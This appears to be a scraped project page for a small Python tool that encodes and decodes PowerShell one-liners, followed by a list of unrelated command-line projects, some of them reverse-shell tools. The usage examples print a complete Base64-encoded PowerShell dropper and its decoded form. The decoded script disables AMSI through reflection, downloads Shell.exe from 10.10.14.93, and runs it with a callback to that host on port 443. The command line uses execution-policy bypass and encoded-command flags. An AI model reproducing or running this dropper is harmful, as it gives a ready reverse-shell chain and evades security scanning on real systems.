A very simple python script to encode and decode PowerShell one-liners.

Related tags

Command-line Toolsps-encoder
Overview

PowerShell Encoder

A very simple python script to encode and decode PowerShell one-liners.

I used Raikia's PowerShell encoder ALOT, but one day it went down, and I was sad! So I created this simple script that I could run on Linux.

For anybody that doesn't know PowerShell doesn't just use Base64, it uses UTF16-LE Base64.

Usage

Show the help:

./ps-encoder.py                                  
Usage: ./ps-encoder.py [OPTION]... [FILE]
PowerShell Base64 encode or decode FILE, or standard input, to standard output.

With no FILE provided as the second argument, the second argument will be encoded or decoded

  -d, --decode      decode the powershell FILE or argument.
  -e, --encode      encode the powershell FILE or argument.
  -h, --help        display this help and exit.

 If you want to ouput to a file use the stdout > operator.

Examples

Encode

Encode a PowerShell dropper file:

./ps-encoder.py -e dropper.txt                    
powershell.exe -exec bypass -enc JABhACAAPQAgAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAcwAoACkAOwBGAG8AcgBFAGEAYwBoACgAJABiACAAaQBuACAAJABhACkAIAB7AGkAZgAgACgAJABiAC4ATgBhAG0AZQAgAC0AbABpAGsAZQAgACIAKgBpAHUAdABpAGwAcwAiACkAIAB7ACQAYwAgAD0AIAAkAGIAfQB9ADsAJABkACAAPQAgACQAYwAuAEcAZQB0AEYAaQBlAGwAZABzACgAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AEYAbwByAEUAYQBjAGgAKAAkAGUAIABpAG4AIAAkAGQAKQAgAHsAaQBmACAAKAAkAGUALgBOAGEAbQBlACAALQBsAGkAawBlACAAIgAqAGkAdABGAGEAaQBsAGUAZAAiACkAIAB7ACQAZgAgAD0AIAAkAGUAfQB9ADsAJABmAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAGYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AOQAzAC8AUwBoAGUAbABsAC4AZQB4AGUAIgAsACAAIgBDADoAXAB3AGkAbgBkAG8AdwBzAFwAdABhAHMAawBzAFwAUwBoAGUAbABsAC4AZQB4AGUAIgApADsACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXABTAGgAZQBsAGwALgBlAHgAZQAiACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIAMQAwAC4AMQAwAC4AMQA0AC4AOQAzACAANAA0ADMAIgA7AAoA

To file:

./ps-encoder.py -e dropper.txt > encoded-dropper.txt

Decode

Decode a PowerShell dropper:

./ps-encoder.py -d JABhACAAPQAgAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAcwAoACkAOwBGAG8AcgBFAGEAYwBoACgAJABiACAAaQBuACAAJABhACkAIAB7AGkAZgAgACgAJABiAC4ATgBhAG0AZQAgAC0AbABpAGsAZQAgACIAKgBpAHUAdABpAGwAcwAiACkAIAB7ACQAYwAgAD0AIAAkAGIAfQB9ADsAJABkACAAPQAgACQAYwAuAEcAZQB0AEYAaQBlAGwAZABzACgAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AEYAbwByAEUAYQBjAGgAKAAkAGUAIABpAG4AIAAkAGQAKQAgAHsAaQBmACAAKAAkAGUALgBOAGEAbQBlACAALQBsAGkAawBlACAAIgAqAGkAdABGAGEAaQBsAGUAZAAiACkAIAB7ACQAZgAgAD0AIAAkAGUAfQB9ADsAJABmAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAGYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AOQAzAC8AUwBoAGUAbABsAC4AZQB4AGUAIgAsACAAIgBDADoAXAB3AGkAbgBkAG8AdwBzAFwAdABhAHMAawBzAFwAUwBoAGUAbABsAC4AZQB4AGUAIgApADsACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXABTAGgAZQBsAGwALgBlAHgAZQAiACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIAMQAwAC4AMQAwAC4AMQA0AC4AOQAzACAANAA0ADMAIgA7AAoA
$a = [Ref].Assembly.GetTypes();ForEach($b in $a) {if ($b.Name -like "*iutils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*itFailed") {$f = $e}};$f.SetValue($null,$true);
(new-object system.net.webclient).downloadfile("http://10.10.14.93/Shell.exe", "C:\windows\tasks\Shell.exe");
Start-Process -FilePath "C:\Windows\Tasks\Shell.exe" -ArgumentList "10.10.14.93 443";

To file:

./ps-encoder.py -d encoded-dropper.txt > dropper.txt
Owner
John Tear
OSCP | OSEP | OSCE - I am me... just an amateur malware developer. If you use my code, don't be naughty, keep it legal!!!
John Tear
GitHub Repository
Simple CLI tool to track your cryptocurrency portfolio in real time.

Simple tool to track your crypto portfolio in realtime. It can be used to track any coin on the BNB network, even obscure coins that are not listed or trackable by major portfolio tracking applicatio

Trevor White 69 Oct 24, 2022
AthenaCLI is a CLI tool for AWS Athena service that can do auto-completion and syntax highlighting.

Introduction AthenaCLI is a command line interface (CLI) for the Athena service that can do auto-completion and syntax highlighting, and is a proud me

dbcli 192 Jan 07, 2023
touch command for Windows

Touch touch command for Windows Setup: Clone the repository git clone https://github.com/g-paras/touch.git cd touch Install touch module python setup.

Paras Gupta 5 Jan 04, 2022
Several tools that can be added to your `PATH` to make your life easier.

CK-CLI Tools Several tools that can be added to your PATH to make your life easier. prettypath Prints the $PATH variable in a human-readable way. It a

Christopher Kumm 2 Apr 21, 2022
Euporie is a text-based user interface for running and editing Jupyter notebooks

Euporie is a text-based user interface for running and editing Jupyter notebooks

781 Jan 01, 2023
Patool is a portable command line archive file manager

Patool Patool is an archive file manager. Various archive formats can be created, extracted, tested, listed, searched, repacked and compared with pato

318 Jan 04, 2023
Generate folder trees directly from the terminal.

Dir Tree Artist 🎨 🌲 Intro Easily view folder structure, with parameters to sieve out what you want. Choose to exclude files from being viewed (.git,

Glenda T 0 May 17, 2022
PipeCat - A command line Youtube music player written in python.

A command line Youtube music player written in python. It's an app written for Linux. It also supports offline playlists that are stored in a

34 Nov 27, 2022
Chat with Rem in Terminal!

Chat with Rem in Terminal!

bariscodefx 1 Dec 19, 2021
MiShell is a multi-platform, multi-architecture project based on the first version (MiShell32)

MiShell is a multi-platform, multi-architecture project based on the first version (MiShell32), which offers super super small reverse shell payloads great for injection in buffer overflow vulnerabil

Kamyar Hatamnezhad 0 Oct 27, 2022
Command line tool for google dorks

CLI for google dorks This is the command line tool made with pytohn which allows the users to perform Google dorks easily Installation Install google

subrahmanya s hegade 3 Feb 08, 2022
swarmexec executes command in swarm service

Swarmexec swarmexec executes command in swarm service Install pip install git+https://github.com/filimon43g/swarmexec.git Config In swarm_config.ini

Phil 2 Nov 23, 2021
gget is a free and open-source command-line tool and Python package that enables efficient querying of genomic databases.

gget is a free and open-source command-line tool and Python package that enables efficient querying of genomic databases. gget consists of a collection of separate but interoperable modules, each des

Pachter Lab 570 Dec 29, 2022
Command Line (CLI) Application to automate creation of tasks in Redmine, issues on Github and the sync process of them.

Task Manager Automation Tool (TMAT) CLI Command Line (CLI) Application to automate creation of tasks in Redmine, issues on Github and the sync process

Tiamat 5 Apr 12, 2022
A Reverse Shell Python Packages

A Reverse Shell Python Packages

1 Nov 03, 2021
CLI tool to build, test, debug, and deploy Serverless applications using AWS SAM

AWS SAM The AWS Serverless Application Model (SAM) is an open-source framework for building serverless applications. It provides shorthand syntax to e

Amazon Web Services 6.2k Jan 08, 2023
Interactive Redis: A Terminal Client for Redis with AutoCompletion and Syntax Highlighting.

Interactive Redis: A Cli for Redis with AutoCompletion and Syntax Highlighting. IRedis is a terminal client for redis with auto-completion and syntax

2.2k Dec 29, 2022
CmdTube is a Python CLI library for searching, downloading, and watching YouTube tutorials

CmdTube is a Python CLI library for searching, downloading, and watching YouTube tutorials. This library was made with programmers in mind and it's dedicated to every programmer who watches YouTube v

Samuel Ayomide Ogunleke 2 Aug 22, 2022
Objexplore is an interactive Python object explorer for the terminal.

Objexplore is an interactive Python object explorer for the terminal. Use it while debugging, or exploring a new library, or whatever! 9D1FAC73-B2A5-4

kylepollina 249 Dec 23, 2022
A begginer reverse shell tool python.

A begginer tools for hacking. The theme of this repository is to bring some ready-made open-source tools for anyone new to the world of hacking. This

Dio brando 2 Jan 05, 2022